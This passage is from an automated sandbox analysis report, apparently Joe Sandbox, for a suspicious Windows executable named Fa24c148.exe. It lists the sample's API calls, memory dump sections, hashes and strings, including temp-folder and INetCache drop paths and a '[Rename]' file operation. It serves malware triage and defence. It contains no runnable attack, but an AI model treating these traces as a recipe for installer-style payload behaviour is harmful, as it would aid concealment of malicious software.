                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045DC
                                                                                                      • Part of subcall function 00405537: GetDlgItemTextW.USER32(?,?,00000400,00404613), ref: 0040554A
                                                                                                      • Part of subcall function 0040600B: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Fa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 0040606E
                                                                                                      • Part of subcall function 0040600B: CharNextW.USER32(?,?,?,00000000), ref: 0040607D
                                                                                                      • Part of subcall function 0040600B: CharNextW.USER32(?,"C:\Users\user\Desktop\Fa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406082
                                                                                                      • Part of subcall function 0040600B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406095
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(00420668,?,?,0000040F,?,00420668,00420668,?,00000000,00420668,?,?,000003FB,?), ref: 0040469D
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046B8
                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,00420658), ref: 0040473E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                    • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack\Iglus237\unsealer$Call
                                                                                                    • API String ID: 2246997448-2961147510
                                                                                                    • Opcode ID: f355fcafbdc44a253fd506062086f2951197c42d039416400d982413e2fc1c25
                                                                                                    • Instruction ID: 0c6fa40730a198f5f3b00d197b033e886b1b3680f215deb67d5ef6a97ab5c625
                                                                                                    • Opcode Fuzzy Hash: f355fcafbdc44a253fd506062086f2951197c42d039416400d982413e2fc1c25
                                                                                                    • Instruction Fuzzy Hash: A79163B1900205BBDB11AFA1DC85AAF77B8EF85314F10847BF601B72D1D77C9A418B69
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                    Strings
                                                                                                    • C:\Program Files (x86)\shaw, xrefs: 004020FB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInstance
                                                                                                    • String ID: C:\Program Files (x86)\shaw
                                                                                                    • API String ID: 542301482-209812835
                                                                                                    • Opcode ID: 9427c6a701c92922babb39cdb8b7d9d670389baac5a1f16205eb8045a6f859ea
                                                                                                    • Instruction ID: 320da03c4b58a6f492d73c9084ae0adc7b8dbf3defd95da7e5f41f6b65968188
                                                                                                    • Opcode Fuzzy Hash: 9427c6a701c92922babb39cdb8b7d9d670389baac5a1f16205eb8045a6f859ea
                                                                                                    • Instruction Fuzzy Hash: 74414E75A00105BFCB00DFA8C988EAE7BB5AF49318B20416AF905EF2D1DA79ED41CB55
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 1974802433-0
                                                                                                    • Opcode ID: f42fc509a8610e2fd9ee7677f8d81a2a35df7b0b7b325dc4dc1c38febfc0d813
                                                                                                    • Instruction ID: 81a3354c9c50dc932bc25f9396bfa9246b1e72d43aeb2e6b96ab1eceb958d047
                                                                                                    • Opcode Fuzzy Hash: f42fc509a8610e2fd9ee7677f8d81a2a35df7b0b7b325dc4dc1c38febfc0d813
                                                                                                    • Instruction Fuzzy Hash: 4CF05EB1A141149BDB00DFE4DD499EEB378FF04328F20497AE101F31D0D6B459409B2A
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041F7
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040420B
                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404228
                                                                                                    • GetSysColor.USER32(?), ref: 00404239
                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404247
                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404255
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0040425A
                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404267
                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040427C
                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004042D5
                                                                                                    • SendMessageW.USER32(00000000), ref: 004042DC
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404307
                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040434A
                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404358
                                                                                                    • SetCursor.USER32(00000000), ref: 0040435B
                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,@qB,00000000,00000000,00000001), ref: 00404370
                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040437C
                                                                                                    • SetCursor.USER32(00000000), ref: 0040437F
                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004043AE
                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004043C0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                    • String ID: @qB$N$open
                                                                                                    • API String ID: 3615053054-1317396031
                                                                                                    • Opcode ID: 9f8ac8ff2f5d328cc3453d20dad54c1a32f190e354825bf3c7395e5a162293c3
                                                                                                    • Instruction ID: bf3a58da35b54ffee1731227a2abeb8335aa36a287bc534981c9d3d9286f6950
                                                                                                    • Opcode Fuzzy Hash: 9f8ac8ff2f5d328cc3453d20dad54c1a32f190e354825bf3c7395e5a162293c3
                                                                                                    • Instruction Fuzzy Hash: F4718FB1A00209BFDB109F61DD85E6A7B79FB44354F00803AFA01B62D0D778AD61CFA9
                                                                                                    APIs
                                                                                                    • lstrcpyW.KERNEL32(00425D38,NUL,?,00000000,?,?,?,00405C39,?,?,00000001,004057B1,?,00000000,000000F1,?), ref: 00405AA5
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C39,?,?,00000001,004057B1,?,00000000,000000F1,?), ref: 00405AC9
                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00425D38,00000400), ref: 00405AD2
                                                                                                      • Part of subcall function 00405948: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 00405958
                                                                                                      • Part of subcall function 00405948: lstrlenA.KERNEL32(00405B82,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 0040598A
                                                                                                    • GetShortPathNameW.KERNEL32(?,00426538,00000400), ref: 00405AEF
                                                                                                    • wsprintfA.USER32 ref: 00405B0D
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426538,C0000000,00000004,00426538,?,?,?,?,?), ref: 00405B48
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B57
                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B8F
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425938,00000000,-0000000A,00409514,00000000,[Rename],00000000,00000000,00000000), ref: 00405BE5
                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405BF7
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405BFE
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405C05
                                                                                                      • Part of subcall function 004059E3: GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\Fa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 004059E7
                                                                                                      • Part of subcall function 004059E3: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403425,?), ref: 00405A09
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                    • String ID: %ls=%ls$8]B$8eB$NUL$[Rename]
                                                                                                    • API String ID: 1265525490-2949686642
                                                                                                    • Opcode ID: af31582807115e4b1434e021074788440192fe112e8d2dfb1a91ec7abac6484c
                                                                                                    • Instruction ID: 0a051ccaee0c074b1a09a4e80aa922ec39551e5d9eafb60cec8afc598b306fa0
                                                                                                    • Opcode Fuzzy Hash: af31582807115e4b1434e021074788440192fe112e8d2dfb1a91ec7abac6484c
                                                                                                    • Instruction Fuzzy Hash: BC412671605B14BBE2206B215C49F6B7A6CDF45728F14003AF901F62D2D67CBD018EBD
                                                                                                    APIs
                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                    • DrawTextW.USER32(00000000,004281A0,000000FF,00000010,00000820), ref: 00401156
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: F
                                                                                                    • API String ID: 941294808-1304234792
                                                                                                    • Opcode ID: 95dead6a558a01d4a5ec967a392ba08a15c3c6741a46ee5c6d7a895f4c731ce1
                                                                                                    • Instruction ID: 4121dad2538bec1171c888a02065f78bbc92972143ed5d2ae8151d97d00695b6
                                                                                                    • Opcode Fuzzy Hash: 95dead6a558a01d4a5ec967a392ba08a15c3c6741a46ee5c6d7a895f4c731ce1
                                                                                                    • Instruction Fuzzy Hash: 68418A71804249AFDB058FA5DD459BFBBB9FF48310F00812AF951AA1A0C738EA51DFA5
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?), ref: 10002391
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                                                                    • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2032781626.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2032762594.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032798460.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032821608.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                                                                    • String ID: @Hmu
                                                                                                    • API String ID: 3579998418-887474944
                                                                                                    • Opcode ID: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                    • Instruction ID: 896c08f96dc03187adf01b888d28386c50d9513e33e57f95a3092ffc5e904c0a
                                                                                                    • Opcode Fuzzy Hash: d06520f5c61e510f0831b34fc4ed5dc6ae45d33c03c026c0edd8301773c2f489
                                                                                                    • Instruction Fuzzy Hash: A3419FB4504706EFF324DF249C94A6A77E8FB443D0F11892DF98AC6199CB34AA94CB61
                                                                                                    APIs
                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Fa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 0040606E
                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 0040607D
                                                                                                    • CharNextW.USER32(?,"C:\Users\user\Desktop\Fa24c148.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033B7), ref: 00406082
